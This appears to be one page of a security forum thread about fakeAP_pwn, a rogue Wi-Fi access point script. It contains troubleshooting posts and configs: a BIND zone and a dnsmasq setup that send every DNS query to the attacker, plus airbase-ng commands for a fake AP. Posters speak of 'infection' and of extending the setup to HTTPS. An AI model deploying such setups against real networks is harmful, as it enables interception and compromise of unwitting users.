Page 6 of 15 FirstFirst ... 45678 ... LastLast
Results 51 to 60 of 144

Thread: [Script] [Video] fakeAP_pwn (v0.3)

  1. #51
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by Eatme View Post
    new version gives me:

    Code:
    [i] Configuring: Chaning monitorInterface to:
    SIOCSIFMTU: No such device
    [!] The monitor interface mon0, isn't correct.
    
    [i] *** BREAK ***
    Im looking into it. (=
    *I've also PM'ed you about it *
    Have you...g0tmi1k?

  2. #52
    Good friend of the forums Eatme's Avatar
    Join Date
    Aug 2009
    Location
    Socks5
    Posts
    308

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by g0tmi1k View Post
    Im looking into it. (=
    *I've also PM'ed you about it *
    pm'd + log :

    Bash | fakeAP_pwn v0.3 (#112) Start - Eatme - NDbBN47c - Pastebin.com

    After running the latest script, Wicd reports all networks with all having %1 WEP even if they're WPA.
    -ok I fix this problem by doing the following commands:
    Code:
    :~# rmmod r8187
    :~# modprobe rtl8187


    This also fixed my error I was having:
    #commented lines 762 - 764
    but you can still take a look at the log, to verify.

    Now latest version #112 is working perfectly. Except Internet does not work after infection, but everything else is good to go.

    ps- is the version 0.7 out yet? i would like to try that AP clone... ;]
    Last edited by Eatme; 09-19-2010 at 06:45 PM.
    Wiffy-Auto-Cracker - was the best thing that ever happen to me. :) Wo0oT :)
    AWUSO36H_500mW_5dBi Antenna

  3. #53
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    here is how to setup the bind dns server to redirect all dns queries

    Code:
    # named.conf
    include "/etc/rndc.key";
    controls {
      inet 127.0.0.1 port 953 allow { localhost; } keys { "rndc-key"; };
    };
    options {
      directory "/var/named";
      recursion true;
    };
    zone "." IN {
      type master;
      file "db.localroot";
    };
    Code:
    # db.localroot
    @ IN SOA hostname.example.com admin.example.com (
           1 ; Serial
           3600 ; Refresh every 1 hours 
           1800 ; Retry every 30 minutes 
           604800 ; Expire after 7 days
           1 ) ; TTL 1 second
           IN NS 10.0.0.1
           IN A 10.0.0.1
    *     IN A 10.0.0.1

  4. #54
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    here is how to setup the bind dns server to redirect all dns queries

    Code:
    # named.conf
    include "/etc/rndc.key";
    controls {
      inet 127.0.0.1 port 953 allow { localhost; } keys { "rndc-key"; };
    };
    options {
      directory "/var/named";
      recursion true;
    };
    zone "." IN {
      type master;
      file "db.localroot";
    };
    Code:
    # db.localroot
    @ IN SOA hostname.example.com admin.example.com (
           1 ; Serial
           3600 ; Refresh every 1 hours 
           1800 ; Retry every 30 minutes 
           604800 ; Expire after 7 days
           1 ) ; TTL 1 second
           IN NS 10.0.0.1
           IN A 10.0.0.1
    *     IN A 10.0.0.1

  5. #55
    Just burned his ISO
    Join Date
    Sep 2010
    Posts
    9

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by joker5bb View Post
    here is how to setup the bind dns server to redirect all dns queries

    Code:
    # named.conf
    include "/etc/rndc.key";
    controls {
      inet 127.0.0.1 port 953 allow { localhost; } keys { "rndc-key"; };
    };
    options {
      directory "/var/named";
      recursion true;
    };
    zone "." IN {
      type master;
      file "db.localroot";
    };
    Code:
    # db.localroot
    @ IN SOA hostname.example.com admin.example.com (
           1 ; Serial
           3600 ; Refresh every 1 hours 
           1800 ; Retry every 30 minutes 
           604800 ; Expire after 7 days
           1 ) ; TTL 1 second
           IN NS 10.0.0.1
           IN A 10.0.0.1
    *     IN A 10.0.0.1
    Pretty slick -

    I was working on something similar when on a whim I wondered if Backtrack had dnsmasq in the repos... sure enough it does. So after a quick apt-get install dnsmasq - this is what I came up with...

    **set-up dnsmasq*
    nano /etc/dnsmasq.conf -
    add these lines:
    interface=at0
    dhcp-range=10.0.0.10,10.0.0.100,6h
    address=/#/10.0.0.1

    /etc/init.d/dnsmasq restart

    **set-up apache**
    nano /etc/apache2/apache2.conf
    add this line:
    ErrorDocument 404 /index.html

    /etc/init.d/apache2 restart

    airbase-ng -e "testwifi" -c 5 wlan1
    ifconfig at0 10.0.0.1 netmask 255.255.255.0 broadcast 10.0.0.255 up

    everything connecting to the tap at at0 gets sent to 127.0.0.1, no matter what they type in, plus at0 can have multiple connections...

  6. #56
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by Casca View Post
    Pretty slick -

    I was working on something similar when on a whim I wondered if Backtrack had dnsmasq in the repos... sure enough it does. So after a quick apt-get install dnsmasq - this is what I came up with...

    **set-up dnsmasq*
    nano /etc/dnsmasq.conf -
    add these lines:
    interface=at0
    dhcp-range=10.0.0.10,10.0.0.100,6h
    address=/#/10.0.0.1

    /etc/init.d/dnsmasq restart

    **set-up apache**
    nano /etc/apache2/apache2.conf
    add this line:
    ErrorDocument 404 /index.html

    /etc/init.d/apache2 restart

    airbase-ng -e "testwifi" -c 5 wlan1
    ifconfig at0 10.0.0.1 netmask 255.255.255.0 broadcast 10.0.0.255 up

    everything connecting to the tap at at0 gets sent to 127.0.0.1, no matter what they type in, plus at0 can have multiple connections...
    nice but bind9 is way better to use
    but there are somethings you are still missing, like https
    also im thinking on how to get multi-client support working, any ideas?

  7. #57
    Just burned his ISO
    Join Date
    Sep 2010
    Posts
    9

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by joker5bb View Post
    nice but bind9 is way better to use
    but there are somethings you are still missing, like https
    also im thinking on how to get multi-client support working, any ideas?
    I installed bind9 and tried your config - you're right, bind9 is way better for this. I'm still looking at the docs, but I think I might have an idea for multi client... gotta play with it a bit.

  8. #58
    Member
    Join Date
    Feb 2009
    Location
    0,0
    Posts
    90

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    g0tmi1k can you add fakeAP_pwn to your google code page so if someone wants to go back a version they can? or is it somewhere that I don't see?

    Thanks!
    C

  9. #59
    Just burned his ISO
    Join Date
    Sep 2010
    Posts
    9

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by cseven View Post
    g0tmi1k can you add fakeAP_pwn to your google code page so if someone wants to go back a version they can? or is it somewhere that I don't see?

    Thanks!
    C
    cp fakeAP_pwn.sh fakeAP_pwn.sh.ver112 - then do the upgrade (fakeAP_pwn.sh -u)

  10. #60
    Member
    Join Date
    Feb 2009
    Location
    0,0
    Posts
    90

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by Casca View Post
    cp fakeAP_pwn.sh fakeAP_pwn.sh.ver112 - then do the upgrade (fakeAP_pwn.sh -u)
    That would work too

    I found Changes - fakeap-pwn - Project Hosting on Google Code (apparently if I used google I sometimes find answers hehe)

Page 6 of 15 FirstFirst ... 45678 ... LastLast

Similar Threads

  1. [Script][Video] EvilGrade (v0.1.1)
    By g0tmi1k in forum BackTrack Videos
    Replies: 27
    Last Post: 03-06-2011, 12:24 PM
  2. [Script] [Video] metasploit-FakeUpdate (v0.1.1)
    By g0tmi1k in forum BackTrack Videos
    Replies: 30
    Last Post: 12-06-2010, 04:53 PM
  3. [Script][Video] - Using McGrew Security's nbnspoof.py
    By orgcandman in forum Beginners Forum
    Replies: 3
    Last Post: 11-17-2010, 07:36 PM
  4. [Script] [Video] FakeAP_pwn (v0.2.1)
    By g0tmi1k in forum BackTrack Videos
    Replies: 184
    Last Post: 09-02-2010, 11:01 AM
  5. Replies: 10
    Last Post: 07-12-2010, 03:04 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •